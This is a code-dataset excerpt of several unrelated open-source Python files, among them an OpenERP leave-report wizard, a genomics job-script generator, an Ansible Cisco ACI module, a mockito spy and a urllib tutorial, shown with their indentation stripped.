jaggu303619/asylum | openerp/addons/hr_holidays/wizard/hr_holidays_summary_employees.py | 52 | 2187 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
import time
from openerp.osv import fields, osv
class hr_holidays_summary_employee(osv.osv_memory):
_name = 'hr.holidays.summary.employee'
_description = 'HR Leaves Summary Report By Employee'
_columns = {
'date_from': fields.date('From', required=True),
'emp': fields.many2many('hr.employee', 'summary_emp_rel', 'sum_id', 'emp_id', 'Employee(s)'),
'holiday_type': fields.selection([('Approved','Approved'),('Confirmed','Confirmed'),('both','Both Approved and Confirmed')], 'Select Leave Type', required=True)
}
_defaults = {
'date_from': lambda *a: time.strftime('%Y-%m-01'),
'holiday_type': 'Approved',
}
def print_report(self, cr, uid, ids, context=None):
data = self.read(cr, uid, ids, [], context=context)[0]
data['emp'] = context['active_ids']
datas = {
'ids': [],
'model': 'hr.employee',
'form': data
}
return {
'type': 'ir.actions.report.xml',
'report_name': 'holidays.summary',
'datas': datas,
}
hr_holidays_summary_employee()
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
rsharris/jun2015lgl | create_script_insert_length_sparse.py | 1 | 17318 | #!/usr/bin/env python
"""
Create a cluster job file to create an average insert length sparsity
discriminator track.
"""
from sys import argv,stdin,stdout,stderr,exit
def usage(s=None):
message = """
usage: create_script_insert_length_sparse [options] > insert_length_sparse.sh
<sub>_<samp>_<type> (required) run descriptor; for example, CS_NORM_PE
means subject "CS", sample "NORM", and type "PE";
other filenames can use "{run}" to refer to this
string
--control=<filename> read control values from a file (see list below)
--base=<path> path prefix; other filenames can use "{base}" to
refer to this path
--chromosomes=<filename> read chromosome names and lengths from a file
(default is {base}/data/hg19.chrom_lengths)
--blacklist=<filename> (cumulative) track file of blacklist intervals
--input=<filename> (required) track file to process
--track=<filename> (required) track file to create
(default is {base}/tracks/{run}.insert_length.sparse)
--tempinput=<filename> temporary file to hold input track file, if
needed; only needed if the input track was gzipped
(default is {base}/tracks/{run}.insert_length.sparse.scratch)
--temp=<filename> temporary file to hold track file, if needed; only
needed if --gzip and --bigwig are both used
(default is {base}/tracks/{run}.insert_length.sparse.temp)
--gzip compress track file
--undated don't include today's date in the track name
--bigwig[=<filename>] create bigwig file in addition to track file
--bigwigchroms=<filename> chromosomes file for bedGraphToBigWig
(default is {base}/temp/ucsc.hg19.chrom_lengths)
--bigwigurl=<url> url for the bigwig file; this can use {bigwig}
for the bigwig filename
--bigwiglink=<filename> path at which to create a symbolic link to the
bigwig and info files; this can use {bigwig}
for the bigwig filename
--bigwigposition=<interval> initial UCSC browser interval for bigwig track
--initialize=<text> (cumulative) shell command to add to job beginning
"shebang:bash" is mapped "#!/usr/bin/env bash"
other commands are copied "as is"
values read from control file:
avgInsertLen.{run}
insert_length_sparse.maskLevel
insert_length_sparse.windowLength
insert_length_sparse.minLength
insert_length_sparse.density
insert_length_sparse.densityClip
insert_length_sparse.samplingStep"""
if (s == None): exit (message)
else: exit ("%s%s" % (s,message))
def main():
global basePath,runName
global debug
bashShebang = "#!/usr/bin/env bash"
# parse args
runName = None
controlFilename = None
basePath = None
blacklistFilenames = []
inputFilename = None
chromsFilename = None
trackName = None
tempInputFilename = None
tempFilename = None
gzipOutput = False
dateInTrackname = True
bigWigFilename = None
bigWigChromsFilename = None
bigWigUrl = None
bigWigLink = None
bigWigPosition = None
bashInitializers = ["set -eu"]
debug = []
for arg in argv[1:]:
if ("=" in arg):
argVal = arg.split("=",1)[1].strip()
if (arg.startswith("--control=")):
controlFilename = argVal
elif (arg.startswith("--base=")) or (arg.startswith("--basepath=")) or (arg.startswith("--path=")):
basePath = argVal
elif (arg.startswith("--blacklist=")):
blacklistFilenames += [argVal]
elif (arg.startswith("--input=")):
inputFilename = argVal
elif (arg.startswith("--chromosomes=")) or (arg.startswith("--chroms=")):
chromsFilename = argVal
elif (arg.startswith("--track=")):
trackName = argVal
elif (arg.startswith("--tempinput=")):
tempInputFilename = argVal
elif (arg.startswith("--temp=")):
tempFilename = argVal
elif (arg == "--gzip"):
gzipOutput = True
elif (arg == "--undated"):
dateInTrackname = False
elif (arg == "--bigwig"):
bigWigFilename = "{track}.bw"
elif (arg.startswith("--bigwig=")):
bigWigFilename = argVal
elif (arg.startswith("--bigwigchromosomes=")) or (arg.startswith("--bigwigchroms=")):
bigWigChromsFilename = argVal
elif (arg.startswith("--bigwigurl=")) or (arg.startswith("--url=")):
bigWigUrl = argVal
elif (arg.startswith("--bigwiglink=")) or (arg.startswith("--link=")):
bigWigLink = argVal
elif (arg.startswith("--bigwigposition=")) or (arg.startswith("--bigwigpos=")):
bigWigPosition = argVal
elif (arg.startswith("--initialize=")) or (arg.startswith("--init=")):
if (argVal == "shebang:bash"):
argVal = bashShebang
if (argVal == "set -eu"):
bashInitializers = [x for x in bashInitializers if (x != "set -eu")]
bashInitializers += [argVal]
elif (arg == "--debug"):
debug += ["debug"]
elif (arg.startswith("--debug=")):
debug += argVal.split(",")
elif (arg.startswith("--")):
usage("unrecognized option: %s" % arg)
elif (runName == None):
fields = arg.split(":",2)
if (len(fields) != 3):
fields = arg.split("_")
if (len(fields) < 3) or (fields[-1] not in ["PE","MP"]):
usage("\"%s\" is not a valid run descriptor" % arg)
runName = "_".join(fields)
else:
usage("unrecognized option: %s" % arg)
if (runName == None):
usage("you have to give me a run descriptor")
if (controlFilename == None):
usage("you have to give me a control filename")
if (inputFilename == None):
usage("you have to give me an input track filename")
if (chromsFilename == None):
chromsFilename = "{base}/data/hg19.chrom_lengths"
if (trackName == None):
trackName = "{base}/tracks/{run}.insert_length.sparse"
if (tempInputFilename == None) and (inputFilename.endswith(".gz")):
tempInputFilename = trackName + ".scratch"
if (tempFilename == None) and (bigWigFilename != None) and (gzipOutput):
tempFilename = trackName + ".temp"
if (bigWigFilename != None):
if (bigWigChromsFilename == None):
bigWigChromsFilename = "{base}/temp/ucsc.hg19.chrom_lengths"
if (bigWigUrl == None):
usage("you have to give me a url for the bigwig file")
trackId = "%s.insert_length.sparse" % runName
##########
# perform filename substitution
##########
if (basePath == None): basePath = "."
elif (basePath.endswith("/")): basePath = basePath[:-1]
controlFilename = do_filename_substitutition(controlFilename)
chromsFilename = do_filename_substitutition(chromsFilename)
# blacklist track names
for (ix,blacklistFilename) in enumerate(blacklistFilenames):
blacklistFilename = do_filename_substitutition(blacklistFilename)
assert (not blacklistFilename.endswith(".gz"))
assert (not blacklistFilename.endswith(".gzip"))
if (not blacklistFilename.endswith(".dat")): blacklistFilename += ".dat"
blacklistFilenames[ix] = blacklistFilename
# input track name
inputFilename = do_filename_substitutition(inputFilename)
gzipInput = False
if (inputFilename.endswith(".gz")): gzipInput = True
elif (inputFilename.endswith(".gzip")): gzipInput = True
elif (not inputFilename.endswith(".dat")): inputFilename += ".dat"
# track name
trackName = do_filename_substitutition(trackName)
trackFilename = trackName
if (gzipOutput):
if (not trackFilename.endswith(".gz")): trackFilename += ".gz"
else:
if (not trackFilename.endswith(".dat")): trackFilename += ".dat"
if (tempInputFilename != None):
tempInputFilename = do_filename_substitutition(tempInputFilename)
if (tempFilename != None):
tempFilename = do_filename_substitutition(tempFilename)
# big wig name
if (bigWigFilename != None):
bigWigFilename = do_filename_substitutition(bigWigFilename)
if ("{track}" in bigWigFilename):
trackTemp = trackName
if (trackTemp.endswith(".gz")): trackTemp = trackTemp[:-3]
elif (trackTemp.endswith(".dat")): trackTemp = trackTemp[:-4]
bigWigFilename = bigWigFilename.replace("{track}",trackTemp)
if (bigWigFilename.endswith(".bw")): infoFilename = bigWigFilename[:-3] + ".info"
else: infoFilename = bigWigFilename + ".info"
if (bigWigChromsFilename != None):
bigWigChromsFilename = do_filename_substitutition(bigWigChromsFilename)
if (bigWigUrl != None):
bigWigTemp = bigWigFilename
slashIx = bigWigTemp.rfind("/")
if (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:]
bigWigUrl = bigWigUrl.replace("{bigwig}",bigWigTemp)
if (bigWigLink != None):
bigWigSave = bigWigLink
bigWigTemp = bigWigFilename
slashIx = bigWigTemp.rfind("/")
if (slashIx >= 0): bigWigTemp = bigWigTemp[slashIx+1:]
bigWigLink = bigWigLink.replace("{bigwig}",bigWigTemp)
infoTemp = infoFilename
slashIx = infoTemp.rfind("/")
if (slashIx >= 0): infoTemp = infoTemp[slashIx+1:]
infoLink = bigWigSave.replace("{bigwig}",infoTemp)
##########
# get values from the control file
##########
avgInsertLen = None
maskLevel = None
windowLength = None
minLength = None
densityThreshold = None
densityClip = None
samplingStep = None
f = file(controlFilename,"rt")
lineNumber = 0
for line in f:
lineNumber += 1
line = line.strip()
if (line == ""): continue
if (line.startswith("#")): continue
fields = line.split()
assert (len(fields) >= 3), \
"not enough fields at control file line %d (%d, expected at least 3)" \
% (lineNumber,len(fields))
assert (fields[1] == "="), \
"can't understand control file line %d:\n%s" \
% (lineNumber,line)
(name,_,val) = fields[:3]
if (name == "avgInsertLen." + runName): avgInsertLen = int(val)
if (name == "insert_length_sparse.maskLevel"): maskLevel = val
if (name == "insert_length_sparse.windowLength"): windowLength = int(val)
if (name == "insert_length_sparse.minLength"): minLength = int(val)
if (name == "insert_length_sparse.density"): densityThreshold = val
if (name == "insert_length_sparse.densityClip"): densityClip = val
if (name == "insert_length_sparse.samplingStep"): samplingStep = int(val)
f.close()
if (windowLength == None): windowLength = minLength
if (avgInsertLen == None): assert(False), "control file lacks avgInsertLen"
if (windowLength == None): assert(False), "control file lacks windowLength"
if (minLength == None): assert(False), "control file lacks minLength"
if (densityThreshold == None): assert(False), "control file lacks density"
if (densityClip == None): assert(False), "control file lacks density clip"
if (samplingStep == None): assert(False), "control file lacks samplingStep"
if (blacklistFilenames != []):
if (maskLevel == None): assert(False), "control file lacks maskLevel"
if ("." in maskLevel):
while (maskLevel.endswith("0")):
maskLevel = maskLevel[:-1]
if (maskLevel.endswith(".")):
maskLevel = maskLevel[:-1]
if ("." in densityThreshold):
while (densityThreshold.endswith("0")):
densityThreshold = densityThreshold[:-1]
if (densityThreshold.endswith(".")):
densityThreshold = densityThreshold[:-1]
if ("." in densityClip):
while (densityClip.endswith("0")):
densityClip = densityClip[:-1]
if (densityClip.endswith(".")):
densityClip = densityClip[:-1]
##########
# create the job's shell script
##########
# write bash intitializers
if (bashInitializers != None):
for (ix,bashInitializer) in enumerate(bashInitializers):
if (bashInitializer != bashShebang): continue
print bashInitializer
bashInitializers[ix] = None
for (ix,bashInitializer) in enumerate(bashInitializers):
if (bashInitializer != "set -eu"): continue
print bashInitializer
bashInitializers[ix] = None
for bashInitializer in bashInitializers:
if (bashInitializer == None): continue
print do_filename_substitutition(bashInitializer)
print
if (dateInTrackname):
print "today=`today {mmm}/{d}/{yyyy}`"
# write commands describing the files the script will create
if (tempInputFilename != None):
print "echo \"will use %s as a temporary input file\"" % tempInputFilename
if (tempFilename != None):
print "echo \"will write temporary files to %s\"" % tempFilename
print "echo \"will write track file to %s\"" % trackFilename
if (bigWigFilename != None):
print "echo \"will write bigwig file to %s\"" % bigWigFilename
# write command(s) to create track file
print
print "echo \"=== creating track %s ===\"" % trackId
if (gzipInput):
commands = []
command = ["time gzip -dc %s" % inputFilename]
commands += [command]
command = ["> %s" % tempInputFilename]
commands += [command]
print
print commands_to_pipeline(commands)
trackSourceFilename = tempInputFilename
else:
trackSourceFilename = inputFilename
commands = []
command = ["time genodsp"]
command += ["--chromosomes=%s" % chromsFilename]
command += ["--show:uncovered"]
command += ["= input %s --missing=-inf" % trackSourceFilename]
command += ["= addconst %s" % avgInsertLen]
command += ["= slidingsum W=%d D=W" % windowLength]
if (blacklistFilenames != []):
command += ["= percentile %s W=%d --min=1/inf --quiet" % (maskLevel,samplingStep)]
command += ["= input %s --missing=-inf" % trackSourceFilename]
command += ["= addconst %s" % avgInsertLen]
command += ["= slidingsum W=%d D=W" % windowLength]
command += ["= percentile %s,%s W=%d --min=1/inf --quiet" \
% (densityClip,densityThreshold,samplingStep)]
if (gzipInput): command += ["= input %s --missing=-inf --destroy" % trackSourceFilename]
else: command += ["= input %s --missing=-inf" % trackSourceFilename]
command += ["= addconst %s" % avgInsertLen]
command += ["= clip --min=percentile%s" % densityClip]
for blacklistFilename in blacklistFilenames:
command += ["= mask %s --mask=percentile%s" % (blacklistFilename,maskLevel)]
command += ["= anticlump --average=percentile%s L=%d" \
% (densityThreshold,minLength)]
for blacklistFilename in blacklistFilenames:
command += ["= mask %s --mask=0" % blacklistFilename]
commands += [command]
if (gzipOutput):
if (tempFilename != None):
command = ["tee %s" % tempFilename]
commands += [command]
command = ["gzip"]
commands += [command]
command = ["> %s" % trackFilename]
commands += [command]
print
print commands_to_pipeline(commands)
# write command(s) to convert track file to bigwig
if (bigWigFilename != None):
print
print "echo \"=== converting track %s to bigwig ===\"" % trackId
if (tempFilename != None): trackInput = tempFilename
else: trackInput = trackFilename
commands = []
command = ["time bedGraphToBigWig"]
command += [trackInput]
command += [bigWigChromsFilename]
command += [bigWigFilename]
commands += [command]
print
print commands_to_pipeline(commands)
if (tempFilename != None):
commands = []
command = ["rm %s" % tempFilename]
commands += [command]
print
print commands_to_pipeline(commands)
description = "sparse intervals in average insert lengths"
if (dateInTrackname): description += " (${today})"
commands = []
command = ["make_bigwig_info"]
command += ["--url=%s" % bigWigUrl]
command += ["--name=\"%s insert lengths sparse\"" % runName]
command += ["--desc=\"%s %s\"" % (runName,description)]
command += ["--autoscale=\"on\""]
command += ["--alwayszero=\"on\""]
command += ["--maxheight=\"10:10:10\""]
command += ["--color=250,30,100"]
if (bigWigPosition != None): command += ["--pos=\"%s\"" % bigWigPosition]
command += ["> %s" % infoFilename]
commands += [command]
print
print commands_to_pipeline(commands)
if (bigWigLink != None):
print
print "rm -f %s" % infoLink
print "ln -s %s %s" % (infoFilename,infoLink)
print "rm -f %s" % bigWigLink
print "ln -s %s %s" % (bigWigFilename,bigWigLink)
infoUrl = bigWigUrl
slashIx = infoUrl.rfind("/")
if (slashIx >= 0): infoUrl = infoUrl[:slashIx]
infoTemp = infoFilename
slashIx = infoTemp.rfind("/")
if (slashIx >= 0): infoTemp = infoTemp[slashIx+1:]
infoUrl = infoUrl + "/" + infoTemp
print >>stderr, infoUrl
print
print "echo \"track URL is %s\"" % (infoUrl)
def commands_to_pipeline(commands):
pipeline = []
for (cmdNum,cmd) in enumerate(commands):
if (cmdNum == 0): prefix = ""
else: prefix = " | "
if (cmd[0].startswith(">")):
assert (cmdNum != 0)
assert (len(cmd) == 1)
prefix = " "
pipeline += [prefix + cmd[0]]
for line in cmd[1:]:
pipeline += [" " + line]
return " \\\n".join(pipeline)
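# Illustration of the pipeline assembly above (the commands are examples only,
# not taken from any real job script):
#   commands_to_pipeline([["time gzip -dc reads.gz"], ["gzip"], ["> reads.dat.gz"]])
# yields:
#   time gzip -dc reads.gz \
#     | gzip \
#       > reads.dat.gz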
def do_filename_substitutition(s):
if ("{base}" in s):
assert (basePath != None)
s = s.replace("{base}",basePath)
if ("{run}" in s):
assert (runName != None)
s = s.replace("{run}",runName)
return s
if __name__ == "__main__": main()
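# Example invocation (editor-added; all paths and URLs are illustrative):
#   create_script_insert_length_sparse CS_NORM_PE \
#       --control=control.values --base=/work/lgl \
#       --gzip --bigwig --bigwigurl=http://example.org/tracks/{bigwig} \
#       > insert_length_sparse.sh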
| gpl-3.0 |
gaddman/ansible | lib/ansible/modules/network/aci/aci_contract_subject_to_filter.py | 2 | 9063 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'certified'}
DOCUMENTATION = r'''
---
module: aci_contract_subject_to_filter
short_description: Bind Contract Subjects to Filters (vz:RsSubjFiltAtt)
description:
- Bind Contract Subjects to Filters on Cisco ACI fabrics.
notes:
- The C(tenant), C(contract), C(subject), and C(filter_name) must exist before using this module in your playbook.
The M(aci_tenant), M(aci_contract), M(aci_contract_subject), and M(aci_filter) modules can be used for these.
seealso:
- module: aci_tenant
- module: aci_contract
- module: aci_contract_subject
- module: aci_filter
- name: APIC Management Information Model reference
description: More information about the internal APIC class B(vz:RsSubjFiltAtt).
link: https://developer.cisco.com/docs/apic-mim-ref/
author:
- Jacob McGill (@jmcgill298)
version_added: '2.4'
options:
contract:
description:
- The name of the contract.
aliases: [ contract_name ]
filter:
description:
- The name of the Filter to bind to the Subject.
aliases: [ filter_name ]
log:
description:
- Determines if the binding should be set to log.
- The APIC defaults to C(none) when unset during creation.
choices: [ log, none ]
aliases: [ directive ]
subject:
description:
- The name of the Contract Subject.
aliases: [ contract_subject, subject_name ]
state:
description:
- Use C(present) or C(absent) for adding or removing.
- Use C(query) for listing an object or multiple objects.
choices: [ absent, present, query ]
default: present
tenant:
description:
- The name of the tenant.
required: yes
aliases: [ tenant_name ]
extends_documentation_fragment: aci
'''
EXAMPLES = r'''
- name: Add a new contract subject to filer binding
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
filter: '{{ filter }}'
log: '{{ log }}'
state: present
delegate_to: localhost
- name: Remove an existing contract subject to filter binding
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
filter: '{{ filter }}'
log: '{{ log }}'
state: present
delegate_to: localhost
- name: Query a specific contract subject to filter binding
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
filter: '{{ filter }}'
state: query
delegate_to: localhost
register: query_result
- name: Query all contract subject to filter bindings
aci_contract_subject_to_filter:
host: apic
username: admin
password: SomeSecretPassword
tenant: production
contract: web_to_db
subject: test
state: query
delegate_to: localhost
register: query_result
'''
RETURN = r'''
current:
description: The existing configuration from the APIC after the module has finished
returned: success
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
error:
description: The error information as returned from the APIC
returned: failure
type: dict
sample:
{
"code": "122",
"text": "unknown managed object class foo"
}
raw:
description: The raw output returned by the APIC REST API (xml or json)
returned: parse error
type: string
sample: '<?xml version="1.0" encoding="UTF-8"?><imdata totalCount="1"><error code="122" text="unknown managed object class foo"/></imdata>'
sent:
description: The actual/minimal configuration pushed to the APIC
returned: info
type: list
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment"
}
}
}
previous:
description: The original configuration from the APIC before the module has started
returned: info
type: list
sample:
[
{
"fvTenant": {
"attributes": {
"descr": "Production",
"dn": "uni/tn-production",
"name": "production",
"nameAlias": "",
"ownerKey": "",
"ownerTag": ""
}
}
}
]
proposed:
description: The assembled configuration from the user-provided parameters
returned: info
type: dict
sample:
{
"fvTenant": {
"attributes": {
"descr": "Production environment",
"name": "production"
}
}
}
filter_string:
description: The filter string used for the request
returned: failure or debug
type: string
sample: ?rsp-prop-include=config-only
method:
description: The HTTP method used for the request to the APIC
returned: failure or debug
type: string
sample: POST
response:
description: The HTTP response from the APIC
returned: failure or debug
type: string
sample: OK (30 bytes)
status:
description: The HTTP status from the APIC
returned: failure or debug
type: int
sample: 200
url:
description: The HTTP url used for the request to the APIC
returned: failure or debug
type: string
sample: https://10.11.12.13/api/mo/uni/tn-production.json
'''
from ansible.module_utils.network.aci.aci import ACIModule, aci_argument_spec
from ansible.module_utils.basic import AnsibleModule
def main():
argument_spec = aci_argument_spec()
argument_spec.update(
contract=dict(type='str', aliases=['contract_name']), # Not required for querying all objects
filter=dict(type='str', aliases=['filter_name']), # Not required for querying all objects
log=dict(type='str', choices=['log', 'none'], aliases=['directive']),
subject=dict(type='str', aliases=['contract_subject', 'subject_name']), # Not required for querying all objects
tenant=dict(type='str', aliases=['tenant_name']), # Not required for querying all objects
state=dict(type='str', default='present', choices=['absent', 'present', 'query']),
)
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
required_if=[
['state', 'absent', ['contract', 'filter', 'subject', 'tenant']],
['state', 'present', ['contract', 'filter', 'subject', 'tenant']],
],
)
contract = module.params['contract']
filter_name = module.params['filter']
log = module.params['log']
subject = module.params['subject']
tenant = module.params['tenant']
state = module.params['state']
# Add subject_filter key to module.params for building the URL
module.params['subject_filter'] = filter_name
# Convert log to an empty string if 'none', as that is what the API expects. An empty string is not a good option to present to the user.
if log == 'none':
log = ''
aci = ACIModule(module)
aci.construct_url(
root_class=dict(
aci_class='fvTenant',
aci_rn='tn-{0}'.format(tenant),
module_object=tenant,
target_filter={'name': tenant},
),
subclass_1=dict(
aci_class='vzBrCP',
aci_rn='brc-{0}'.format(contract),
module_object=contract,
target_filter={'name': contract},
),
subclass_2=dict(
aci_class='vzSubj',
aci_rn='subj-{0}'.format(subject),
module_object=subject,
target_filter={'name': subject},
),
subclass_3=dict(
aci_class='vzRsSubjFiltAtt',
aci_rn='rssubjFiltAtt-{0}'.format(filter_name),
module_object=filter_name,
target_filter={'tnVzFilterName': filter_name},
),
)
aci.get_existing()
if state == 'present':
aci.payload(
aci_class='vzRsSubjFiltAtt',
class_config=dict(
tnVzFilterName=filter_name,
directives=log,
),
)
aci.get_diff(aci_class='vzRsSubjFiltAtt')
aci.post_config()
elif state == 'absent':
aci.delete_config()
# Remove subject_filter used to build URL from module.params
module.params.pop('subject_filter')
aci.exit_json()
if __name__ == "__main__":
main()
| gpl-3.0 |
alistair-broomhead/robotframework-selenium2library | test/lib/mockito/spying.py | 70 | 1062 | #!/usr/bin/env python
# coding: utf-8
'''Spying on real objects.'''
from invocation import RememberedProxyInvocation, VerifiableInvocation
from mocking import TestDouble
__author__ = "Serhiy Oplakanets <[email protected]>"
__copyright__ = "Copyright 2009-2010, Mockito Contributors"
__license__ = "MIT"
__maintainer__ = "Mockito Maintainers"
__email__ = "[email protected]"
__all__ = ['spy']
def spy(original_object):
return Spy(original_object)
class Spy(TestDouble):
strict = True # spies always have to check if method exists
def __init__(self, original_object):
self.original_object = original_object
self.invocations = []
self.verification = None
def __getattr__(self, name):
if self.verification:
return VerifiableInvocation(self, name)
else:
return RememberedProxyInvocation(self, name)
def remember(self, invocation):
self.invocations.insert(0, invocation)
def pull_verification(self):
v = self.verification
self.verification = None
return v
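# Hypothetical usage sketch (editor-added): a spy delegates to the real object
# while recording each call, newest first, in `invocations`. This assumes the
# companion invocation module's RememberedProxyInvocation both remembers and
# forwards the call, as its name suggests.
def _spy_example():
    target = []
    s = spy(target)
    s.append('x')                     # proxied through to list.append
    assert target == ['x']            # the real object was modified
    assert len(s.invocations) == 1    # and the call was remembered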
| apache-2.0 |
michaelliao/learn-python3 | samples/commonlib/use_urllib.py | 20 | 2195 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from urllib import request, parse
# get:
with request.urlopen('https://api.douban.com/v2/book/2129650') as f:
data = f.read()
print('Status:', f.status, f.reason)
for k, v in f.getheaders():
print('%s: %s' % (k, v))
print('Data:', data.decode('utf-8'))
# advanced get:
req = request.Request('http://www.douban.com/')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
with request.urlopen(req) as f:
print('Status:', f.status, f.reason)
for k, v in f.getheaders():
print('%s: %s' % (k, v))
print('Data:', f.read().decode('utf-8'))
# post:
print('Login to weibo.cn...')
email = input('Email: ')
passwd = input('Password: ')
login_data = parse.urlencode([
('username', email),
('password', passwd),
('entry', 'mweibo'),
('client_id', ''),
('savestate', '1'),
('ec', ''),
('pagerefer', 'https://passport.weibo.cn/signin/welcome?entry=mweibo&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom&jumpfrom=weibocom')
])
req = request.Request('https://passport.weibo.cn/sso/login')
req.add_header('Origin', 'https://passport.weibo.cn')
req.add_header('User-Agent', 'Mozilla/6.0 (iPhone; CPU iPhone OS 8_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/8.0 Mobile/10A5376e Safari/8536.25')
req.add_header('Referer', 'https://passport.weibo.cn/signin/login?entry=mweibo&res=wel&wm=3349&r=http%3A%2F%2Fm.weibo.cn%2F%3Fjumpfrom%3Dweibocom')
with request.urlopen(req, data=login_data.encode('utf-8')) as f:
print('Status:', f.status, f.reason)
for k, v in f.getheaders():
print('%s: %s' % (k, v))
print('Data:', f.read().decode('utf-8'))
# with proxy and proxy auth:
proxy_handler = request.ProxyHandler({'http': 'http://www.example.com:3128/'})
proxy_auth_handler = request.ProxyBasicAuthHandler()
proxy_auth_handler.add_password('realm', 'host', 'username', 'password')
opener = request.build_opener(proxy_handler, proxy_auth_handler)
with opener.open('http://www.example.com/login.html') as f:
pass
| gpl-2.0 |
dongritengfei/phantomjs | src/qt/qtwebkit/Tools/QueueStatusServer/model/activeworkitems.py | 140 | 3975 | # Copyright (C) 2010 Google Inc. All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
from google.appengine.ext import db
from datetime import timedelta, datetime
import time
from model.queuepropertymixin import QueuePropertyMixin
class ActiveWorkItems(db.Model, QueuePropertyMixin):
queue_name = db.StringProperty()
item_ids = db.ListProperty(int)
item_dates = db.ListProperty(float)
date = db.DateTimeProperty(auto_now_add=True)
# The id/date pairs should probably just be their own class.
def _item_time_pairs(self):
return zip(self.item_ids, self.item_dates)
def _set_item_time_pairs(self, pairs):
if pairs:
# The * operator raises on an empty list.
# db.Model does not accept tuples, so we have to make lists.
self.item_ids, self.item_dates = map(list, zip(*pairs))
else:
self.item_ids = []
self.item_dates = []
def _append_item_time_pair(self, pair):
self.item_ids.append(pair[0])
self.item_dates.append(pair[1])
def _remove_item(self, item_id):
nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[0] != item_id]
self._set_item_time_pairs(nonexpired_pairs)
@classmethod
def key_for_queue(cls, queue_name):
return "active-work-items-%s" % (queue_name)
@classmethod
def lookup_by_queue(cls, queue_name):
return cls.get_or_insert(key_name=cls.key_for_queue(queue_name), queue_name=queue_name)
@staticmethod
def _expire_item(key, item_id):
active_work_items = db.get(key)
active_work_items._remove_item(item_id)
active_work_items.put()
def expire_item(self, item_id):
return db.run_in_transaction(self._expire_item, self.key(), item_id)
def deactivate_expired(self, now):
one_hour_ago = time.mktime((now - timedelta(minutes=60)).timetuple())
nonexpired_pairs = [pair for pair in self._item_time_pairs() if pair[1] > one_hour_ago]
self._set_item_time_pairs(nonexpired_pairs)
def next_item(self, work_item_ids, now):
for item_id in work_item_ids:
if item_id not in self.item_ids:
self._append_item_time_pair([item_id, time.mktime(now.timetuple())])
return item_id
return None
def time_for_item(self, item_id):
for active_item_id, time in self._item_time_pairs():
if active_item_id == item_id:
return datetime.fromtimestamp(time)
return None
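# Sketch of the intended lease cycle (editor-added; the names below are
# hypothetical — the real callers live elsewhere in the queue server):
#   items = ActiveWorkItems.lookup_by_queue('commit-queue')
#   items.deactivate_expired(datetime.now())
#   item_id = items.next_item(pending_item_ids, datetime.now())
#   ... process item_id, then release the lease ...
#   items.expire_item(item_id)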
| bsd-3-clause |
ritzk/ansible-modules-core | utilities/logic/fail.py | 198 | 1458 | #!/usr/bin/python
# -*- coding: utf-8 -*-
# Copyright 2012 Dag Wieers <[email protected]>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
